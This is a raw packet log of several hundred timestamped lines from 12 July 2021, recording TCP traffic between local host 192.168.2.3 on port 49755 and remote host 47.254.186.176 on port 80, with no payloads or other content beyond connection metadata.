Jul 12, 2021 10:29:51.668855906 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.668896914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668912888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.668939114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.669018984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669044018 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669059992 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669080019 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.669109106 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.669380903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669418097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669437885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669476986 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.669500113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669528961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669548988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669560909 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.669583082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669590950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.669620991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669673920 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.669775963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669845104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669888020 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.669905901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669924974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669940948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669956923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669971943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.669989109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670010090 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.670031071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670051098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.670100927 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670118093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670134068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670141935 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.670175076 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.670188904 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670218945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670260906 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.670283079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670300961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670321941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670337915 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670363903 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.670422077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670444965 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.670491934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670510054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670525074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670535088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.670553923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670573950 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.670661926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670715094 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.670759916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670779943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670798063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670834064 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.670897007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670913935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670931101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670939922 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.670955896 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.670978069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.671015978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671032906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671050072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671058893 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.671075106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671093941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671099901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.671133041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.671164036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671181917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671221972 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.671243906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671261072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671339035 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.671475887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671580076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671597004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671613932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671637058 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.671679974 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.671704054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671720028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671736002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671751976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671775103 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.671802044 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.671967983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.671986103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672002077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672020912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672035933 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.672060966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672069073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.672086000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672102928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672118902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672138929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672148943 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.672184944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672203064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672214985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.672246933 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.672322035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672342062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672358990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672367096 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.672416925 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.672439098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672456026 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672472954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672498941 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.672528028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672548056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672564983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672588110 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.672627926 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.672928095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672945976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672960997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.672981024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673019886 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.673038960 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.673166037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673232079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673276901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673286915 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.673305035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673321962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673352003 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673376083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.673399925 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.673450947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673643112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673659086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673677921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673696041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673711061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673744917 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673763990 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.673777103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673795938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673846960 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.673872948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673921108 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.673964024 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673980951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.673996925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674051046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674058914 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.674076080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674103975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674118042 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.674144030 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.674179077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674197912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674256086 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.674278975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674298048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674351931 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.674491882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674572945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674634933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674640894 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.674659014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674674034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674689054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674698114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.674711943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674741030 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.674772978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674906015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674942970 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.674962997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.674993038 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675017118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675034046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675061941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675076962 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675183058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675204039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675231934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675239086 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675268888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675292015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675301075 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675323009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675334930 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675357103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675396919 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675431967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675452948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675508022 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675551891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675576925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675599098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675622940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675640106 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675664902 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675682068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675720930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675743103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675766945 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675808907 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675831079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675854921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675877094 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675888062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675915003 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.675920963 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675956964 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.675998926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676021099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676074982 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.676106930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676299095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676321983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676345110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676362991 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.676378965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676397085 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.676409006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676465988 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.676506996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676641941 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676665068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676697969 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.676832914 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676857948 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676878929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676898003 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.676932096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.676939011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.676959991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677023888 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.677067041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677194118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677248001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.677269936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677293062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677314997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677341938 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677346945 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.677370071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677381039 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.677433014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677473068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677481890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.677557945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677619934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677634001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.677654982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677676916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677700996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677726030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677733898 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.677757025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677767992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.677792072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677843094 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.677952051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677974939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.677997112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678010941 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.678042889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.678119898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678144932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678165913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678189039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678209066 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.678220034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678250074 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.678267956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678314924 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.678344965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678417921 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678442001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678462029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678494930 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.678524971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678548098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.678570032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678621054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.678651094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678674936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678698063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678730011 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.678880930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678910971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678931952 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.678944111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678970098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.678997993 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.679068089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679152012 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.679176092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679198980 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679265976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679300070 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.679344893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679399967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679411888 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.679482937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679507017 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679529905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679541111 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.679562092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679586887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679594040 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.679617882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679642916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679655075 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.679677010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679686069 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.679708004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679729939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679752111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679775000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679795027 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.679805994 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679827929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679853916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679860115 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.679882050 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679894924 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.679915905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679939032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.679963112 CEST	80	49755	47.254.186.176	192.168.2.3
